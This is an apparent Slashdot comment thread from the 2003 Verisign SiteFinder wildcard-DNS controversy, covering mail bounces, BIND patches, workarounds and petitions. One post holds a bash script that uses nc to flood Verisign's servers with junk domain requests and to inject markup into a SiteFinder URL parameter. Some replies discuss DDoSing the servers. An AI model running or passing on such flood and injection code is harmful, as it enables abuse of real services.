[DrSkwid]

You may like mistyped URIs to go to a search engine but do you like your mis-typed email addresses resulting in your mail being sent to Verisign?

Re:Internet != web, fool

[irc.goatse.cx+troll]

They have no MX record, so your mailserver should bounce it anyways. If on the off chance your mailserver is stupid enough to send it to an A record, their smtpd bounces it in a non-inteligent manner.

Netcraft hasn't posted any news on this yet...

[tugrul]

I wonder when Netcraft is going to acknowledge and adjust its database to ignore bogus domains.

Re:Netcraft hasn't posted any news on this yet...

[WWWWolf]

Well, I just checked and it appeared to say that acompletelybogusdomain.com was nonexistent. Either a) Netcraft has changed their system, or b) Sitefinder is completely slashdotted, which it seems to be.

MoveOn FCC ruling?

[Heisenbug]

OK, how about this one:

http://slashdot.org/article.pl?sid=03/09/16/1923 25 0

It was only yesterday -- the Senate voted to roll back the FCC media consolidation ruling, based to some extent on the MoveOn petition. Check out the picture of Trent Lott standing next to 360,000 pieces of paper. One of those is mine, and it looks like it carried some weight to me.

I went to school with Eli Pariser, btw -- he's one of the guys who runs MoveOn. Check out what else they've done to see how online activism can be effective.

use .ORG?

[Quixotic]

nt

Guilty

[StewedSquirrel]

haha.. you got me there.

Thanks!!

Esoteric words like altruistic seem to befuddle me sometimes. :-P

Eschew Obfuscation...

Stewey

YHBT

[tiltowait]

That's not Seth. Seth (90154) knows how to spell his last name.

Not a solution

[mph]

That is not a solution; at best it's a workaround. There's a fundamental difference between a DNS query returning NXDOMAIN (as it should), and blocking traffic to site returned in the fraudulent A record returned by Verisign.

wopr:~$ sudo ipfw add 1 deny ip from any to 64.94.110.11
Password:
00001 deny ip from any to 64.94.110.11

wopr:~$ ping fleemgoats.org
ping: cannot resolve fleemgoats.org: Unknown host

wopr:~$ ping fleemgoats.com
PING fleemgoats.com (64.94.110.11): 56 data bytes
ping: sendto: Permission denied
ping: sendto: Permission denied
ping: sendto: Permission denied
^C
--- fleemgoats.com ping statistics ---
3 packets transmitted, 0 packets received, 100% packet loss

See the difference?

Re:Not a solution

[Si]

Sure it's a solution. Any address without a valid DNS entry will return 64.94.110.11, which will return as unreachable - seems like exactly the behaviour I want.

Detail exactly how this "work-around" does not solve the problem of not wishing to direct any traffic to this net-fraud of a site.

Re:Not a solution

[mph]

Sure it's a solution. Any address without a valid DNS entry will return 64.94.110.11, which will return as unreachable - seems like exactly the behaviour I want.

Well, if that's the behavior you want, that's fine. I want to get a "Host not found" DNS error, just like I did last week before all this nonsense started.

My point is that with your "solution," applications still do something different than what they did before Verisign started all of this. I thought I made that clear with my "ping" example.

how to stop it now until BIND is fixed

[NetSurferHI]

So based on the info in his article, all you have to do to stop this is create an entry in your /etc/hosts file pointing sitefinder.verisign.com to a non-answering ip address such as 127.0.0.1 (assuming you are not running a web server on your desktop.) Once BIND is fixed comment it out.

Re:how to stop it now until BIND is fixed

[node159]

Dude, that don't fix the apps, which is the main problem that the dumb cunts at VerShit didn't think about. Now all my programs can't figure out that the entered address is not at ip 216.168.224.63 or 64.94.110.11. So instead it tries those Ip's and has to time out. Hopefully their servers are getting flooded the fuck out but I guess one really needs to write a proper app to cause any serious damage that may get them to change their minds.

Oh No, Seth!

[pyrrho]

Looks like Verisign is being stalked by Seth

Could this be a sign that Verisign is about to become a slashdot editor?

PS: for some reason censorware.org and stalkedbyseth.com are not responding... the link is to google cash.

Re:Congratulations

[pyrrho]

oh, very convincing not-Seth!

Print out the petition when done

[gad_zuki!]

>I would like to see just one online petition that has carried any weight.

There was a success with webtv, its probably still linked at the petition site, but unless someone prints these damn things out and hands them to the politicos (like in this photo from moveon.org) its a waste of bits.

Overture

[Jeffrey+Baker]

No mystery here. The results on Verisign's dipshit new unservice are provided by paid-listings search engine Overture, now owned by yahoo.

A better one:

[pr0ntab]

#!/bin/bash
#
#Replace dumbwordlist if you like with nonsense
#that will be used to fill up Verisign's database
#with useless crap.
#To make it eviler, remove the $((RANDOM%10)) parts,
#or maybe wrap the inner loops with an outer loop that
#picks a random postfix and asks for all of the
#domains ending, with that prefix, 10 times or so.
#Since the stuff should get asked for repeatedly,
#maybe they'll get "false positives".
#
#Also note that this simulates the first request to
#the siteverifier page, which sends a redirect to the
#real page with the ads and links on it. We ignore it
#and send the second request, knowing full well what
#the first one looked like. Hopefully this "seems"
#legitimate on their end.
#
#Your ISP may have already null-routed 64.94.110.11;
#if so this script will hang with no output.
#To remedy, remove the first nc command (up to the first
# %%EOF%%). Leave the second one, as it appears
#that one is still visible. If both are invisible, your
#ISP has _really_ gone the distance to piss of Verisign
#
#Kudos!

dumbwordlist="rem0te br4nd sar1n flau7a mickst3r robbi3 ch3my jjopppl fuckkksl ncmaster df753 klopuier beeiosla cuntwh4ccker openinsertcl oofignet phaconspal qrrtioe sumnsan rx30sony popopospospposp llqksjajjq0 aslashji aklhjk3421 halff liveees ttooowo toowoo aslllkoq"

for each in $dumbwordlist;
do
for eachi in $dumbwordlist;
do fakedom=$each$((RANDOM%10))$eachi$((RANDOM%10));
nc 64.94.110.11 80 <<%%EOF%%
GET /${fakedom} HTTP/1.1
Host: ${fakedom}.com
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*

%%EOF%%
nc 12.158.80.10 80 <<%%EOF%%
GET /lpc?url='%3E%3Cfont%20size=+5%20color=%23FF0000%3 E\
VERISIGN%20SUCKS%20MY%20${fakedom}%3C/font%3E HTTP/1.1
Host: sitefinder.verisign.com
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*

%%EOF%%

done
done

Waaaaay to easy for the wormies...

[gnovos]

They've just shot themselves in the foot, you know. Now worms from all over can hit them with random non-resolving .com/.net queries, hard, and they can't simply point them at 127.0.0.1 like windowsupdate did. I wonder if they are expecting this?

Re:Waaaaay to easy for the wormies...

[nacturation]

Do you think worms create phony domain names and then do a DNS query to find the random IP address? Of course not! They simply create a random IP address in the first place.

Re:Waaaaay to easy for the wormies...

[i.r.id10t]

Like someone posted way up top with that lynx script to dump results to /dev/null, you can just get the md5sum of a small, constantly changing file, trim 10 or so characters out of it, and slap a www. and a .com on it.

Just using a random IP wouldn't be the point, since I'm guessing the idea is to ddos the verisign servers...

Re:Waaaaay to easy for the wormies...

[nacturation]

Just using a random IP wouldn't be the point, since I'm guessing the idea is to ddos the verisign servers...

Well, if a worm is specifically created to do this, then it would make sense. I had (perhaps incorrectly) assumed that the original post was referring to existing worms, which don't spread to other random IP addresses by doing a DNS query.

Re:Mail addresses (open letter to above addresses)

Dude,

You gotta, like, get professional language-ified an' stuff, 'cos those suits don't give one damn about 17 year old kids.

Your letter reads a like Ellen Feiss:

"So I was surfing the internet on my PC, when VeriSign redirecteded my mispelled domain name.... BEEP BEEP BEEP BEEP BEEP BEEP. They're hijacking the internet.... it's such............ a bummer."

Make them pay for it. It is so simple

[northwind]

The other DNS registrars should sue Verisign for all those domains that they are illegally using and not paying for.
Everybody else has to pay $ for a domain name, and so should Verisign be forced to pay for all those domain names they now are using. Suitably they could pay FSF.

If you are unhappy with Verisigns piracy then just call their 800 number and support the phone company.

From the Verisign Sitefinder Terms of Service

[scovetta]

(from )
At any time VeriSign may modify or terminate these terms of use...Your continued use of the VeriSign Services constitutes your agreement to all such terms, conditions, and notices.
So, essentially, typos now enter everyone into a license?

What browser?

[zangdesign]

What browser are you using to test this, because Firebird just says it times out? Perhaps my ISP pulled a workaround, but I have yet to get a Verisign page.

Re:What browser?

[Tony+Hoyle]

The workarounds are starting to filter onto the live 'net now... hopefully give it a week or two it'll all be over whether vericrap give it up or not.

You can see if your DNS is patched by trying a host lookup on some random domain using dig and seeing if you get a proper NXDOMAIN response.

None - they are not forging MX records

[crucini]

[red]$ host weriowerwer.com
weriowerwer.com. has address 64.94.110.11
[red]$ host -t mx weriowerwer.com
[red]$

The MX record determines where mail gets sent.

Re:None - they are not forging MX records

[AndrewRUK]

Except that, if a domain name has no MX, the A record is used instead.
Quoteth chapter & verse (RFC 2821, section 5):
"If no MX records are found, but an A RR is found, the A RR is treated as if it was associated with an implicit MX RR, with a preference of 0, pointing to that host."
So, any mail to a non-existant domain will be (attempted to) be delivered to 64.94.110.10, which helpfully has "Snubby Mail Rejector Daemon" running on port 25.

Re:None - they are not forging MX records

[crucini]

I didn't know that. So I sent mail to a nonexistent domain, and sure enough I got a bounce from 64.94.110.11. Yuck.

SPEWS is not lost

[crucini]

Try spews.bl.reynolds.net.au. But I'm surprised that an absence of SPEWS made a big difference to your filtering - I find that they block very little.

Otherwise, agreed.

Solution

[OriginalGlug]

The IP adress is being blocked. But using IE there is a simple way to see this in action. What you do is open IE, put in a bogus address and notice that it successfully finds it and then can't load it. To see what is -suppose- to happen, unplug your network/modem connection and then try to load a new bogus page (because of caching). See how it gets stuck on the "Finding Page" message, that's because it can't find the IP adress in the DNS. That's suppose to happen.

No, I'm New Here

[New+Here]

No, I'm New Here

The message matters as much as the medium

[gidds]

Of course, it depends on where you are. I'm in the UK, and when I faxed my MP last year (from the FaxYourMP web site), about the proposed amendment to the RIP bill, he responded with a letter (on 'House of Commons' headed paper) almost immediately, and another a month later when the amendment was withdrawn. (I don't like the man personally, and I don't agree with some of his politics, but as a constituency MP he does a good job.)

And it depends on the content as well as the medium. My fax was original, business-like, and carefully-argued, though partly based on stuff available online. I suspect that originality, literacy, clarity, conciseness, and focus all count well, just as obvious copying, rambling, pointless emotion, length, and lack of focus will make a communication less likely to be read or acted upon. You need to state carefully but briefly the problem, the cause, what you're asking your representative to do, and why; if you do that politely, it'd be an inconsiderate person who didn't at least reply, whatever the medium.

I suspect that the reason online petitions often don't seem to count is less that they're online, and more that they're petitions; without a direct, personal request for action, any communication will have less weight.

How about .nu?

[Granis]

The company behind the .nu addreses (www.nunames.nu) has used this practise with not returning a proper domain not existant error message as long as I can remember. Instead you get to a page with info where you can sign up for this .nu address.

I realize that .com and .net are _far_ more used than .nu addresses, but it's still the same principal, right?

Verisign might be doing this for a reason

[fname]

Yes, Verisign is evil and the *.com thing is ridiculous. But they may be rotating typo-corretions in order to gather data. They probably want to come up w/ a better typo-correcting method, and that seems a good way to do it. Not that I approve. Boy, once they get a few thousand people hitting the same typo, do you think a "sister company" will register the domain?

Sneaky bastards.

Verisign's Developer's Guide to DNS Wildcards

[Rufus+T.+Firefly]

Verisign's Developer's Guide to DNS Wildcards

BIND patch

[Dasigner]

Check it out...

BIND delegation-only patch:

In response to high demand from our users, ISC is releasing a patch for BIND to support the declaration of "delegation-only" zones ... This can be used to filter out "wildcard" or "synthesized" data from NAT boxes or from authoritative name servers whose undelegated (in-zone) data is of no interest.

verisign-grs contact info

[HardCase]

From the verisign-grs.com WHOIS:

Administrative Contract:
VERISIGN GLOBAL REGISTRY SERVICES rcc@verisign.com
21345 Ridgetop Circle
Dulles, VA 20166
US
703-742-0400 fax: 703-421-6703

Dunno how correct it is...god forbid that Verisign should put incorrect info in the whois database.

Well, this explains a lot.

[seebs]

Be careful when browsing; if you're accepting cookies, they're tracking you! That's why they get called VeriSlime. I got my wife to do a cool slimy logo for them. http://www.seebs.net/log/archives/000065.html

Post Hoc Ergo Propter Hoc

[camusflage]

It was only yesterday -- the Senate voted to roll back the FCC media consolidation ruling, based to some extent on the MoveOn petition.

Post hoc ergo propter hoc. After that therefore because of that. It's a common fallacy of logic, along with being the root of much of athletes' superstition (not shaving until a baseball pitcher loses, etc). Simply because Congress finally got something right doesn't mean you, MoveOn, or any one action in particular had anything at all to do with it.

Personally, I think it was because Clearchannel simply was late in mailing out their bribe^Wdonations, but that's just me.

And in other news, ICANN gets contract extension

[camusflage]

ICANN gets another three years to run dns. Way to go Department of Commerce! I hope this clears up any impression that ICANN's efficacy matters one whit.

Re:Cats, Dogs, OT.

[cujo_1111]

Counter-Observe:

Cat 1: What happen?
Cat 2: Someone set up us the bomb
Cat 3: We get signal
Cat 1: What!
Cat 3: Main screen turn on.

Cat 1: It's you!!
Dogs: How are you gentlemen!!
Dogs: All your base are belong to us
Dogs: You are on the way to destruction

Cat 1: What you say?
Dogs: You have no chance to survive make your time
Dogs: Ha ha ha ....
Cat 3: Captain!!

Cat 1: Take off every 'ZIG'!!
Cat 1: Move 'ZIG'.
Cat 1: For great justice.

---

Dogs 1 : Cats 1

Another .COM bust?

[krray]

Is this going to be another .COM bust? It might be the beginning of the end for .COM & .NET (it is for me at least :), but certainly not of the Internet as we know and love to hate it. If everybody jumps one way or the other NOW we can all just BLOCK .COM and .NET traffic probably within a year or two.

Thankfully I had the fore-site to also register all my domains in the .US category. Unfortunately they're also currently held by ... Verisign. I do believe that .US is, however, authoritatively not handled by "them" and most definitely (and will be) moved to another provider.

I handle all my own traffic 100% (including DNS) -- and it appears that Verisign can only pull this stunt with .COM and .NET. Effective immediately we've moved from .COM to .US

Though I'm also considering a couple of the domains for .ORG (non-profit) with the current economy recently... :)

VeriSign's new ad campaign with naked women

[Pan+T.+Hose]

Say about them what you want but I admire VeriSign's new ad campaign.

www.verisignneedstogetaclue.com could not be found

[farlukar]

My ISP actually has a clue, and set their DNS to only use "NS delegation" for .com and .net, so Verisigns wildcards have no effect whatsoever.

I'd like a pony

[pjc50]

Your wish list is all very well, but what happens when someone wants to join your internet who disagrees with your ideals?

Ditto

[Otto]

I was able to make it happen yesterday, but today, I'm getting failed back. I tried a web page, then tried nslookup, and even tried several of the online web-based nslookup tricks as well. Nothing.

Either everyone I tried is now blocking this, or the BIND patch has spread *unbelievably* rapidly, or they dropped the idea completely.

Anyone have info on which of these is going on?

Re:Ditto

[qwertyatwork]

Its 2 days since your post and I get verisign at work for bad domains.

Re:Ditto

[Otto]

Yeah, I'm getting it again now too. I think they had it down for some reason. Possibly to fix their slashdotted server or some such.

Well then

[autopr0n]

I'm glad you're not in charge!

Latin Makes You Sound Smart

[Heisenbug]

Simply because Trent Lott and whatsisname, the sponsor of the bill, held a press conference featuring boxes and boxes and boxes of petitions, doesn't mean that those petitions had any influence. OK, good call. But they *say* that it had an influence, right, the good congressmen flat-out say it, and I can't help agreeing that all that support must have made it just a little bit easier to vote this way ...

Maybe you're right, though. Maybe Clearchannel just forgot to send in a bribe. I bet they're real pissed off now, too. After all, the Senate just went and rolled back those new limits on radio consolidation. Now Clearchannel might have to go and buy *more* radio stations, and you know how much they hate doing that.

Thanks for making my day a little brighter.

lawsuit for trademark infringement?

[john_uy]

can companies sue verisign for trademark infrigement or confusion?

for example, you have a domain acme.com. there may be a legal basis for suing verisign if let say the acme.net is not yet registered or variants such as acmee.com or acmes.com or acmecorp.com or acmeinc.com.

because it is being redirected to their site for commecial purpose, you can now argue that verisign is using your trademark to gain fees (for registration so you can have all the domain variants for yourself registered by verisign) or sue them because they are using your domain to gain revenue (due to their search.)

if they cannot be stopped from the technical perspective, a barrage of lawsuits by corporations will catch them off hand and hopefully return everything back to as it should be.

Does it matter?

[Snaller]

If the domain name isn't registered to begin with - does it matter?

Who does the BIND patch?

[lrucker]

Is this something my ISP needs to do, or do I need it on my machine?

Re:Who does the BIND patch?

[Dasigner]

Well, if you use your own nameservers in your resolv.conf, I suppose modifying them would do the trick. I haven't tried this out yet, though.

Verisign is stealing my hits

[neves]

I really like Microsoft Internet explorer and MSM feature of recommending similar domains. It helps users of the web browser and doesn't mess with other internet protocols.

Verisign is messing with everybody that checks for domains and is stealing my trafic, since they just recommends domains of Verisign. If you search for my domain without the brazil suffix .br, MSNs recomends my brazilian site. Verisign just steals it.

Re:am i missing something?

[proj_2501]

speak fucking english, you moron.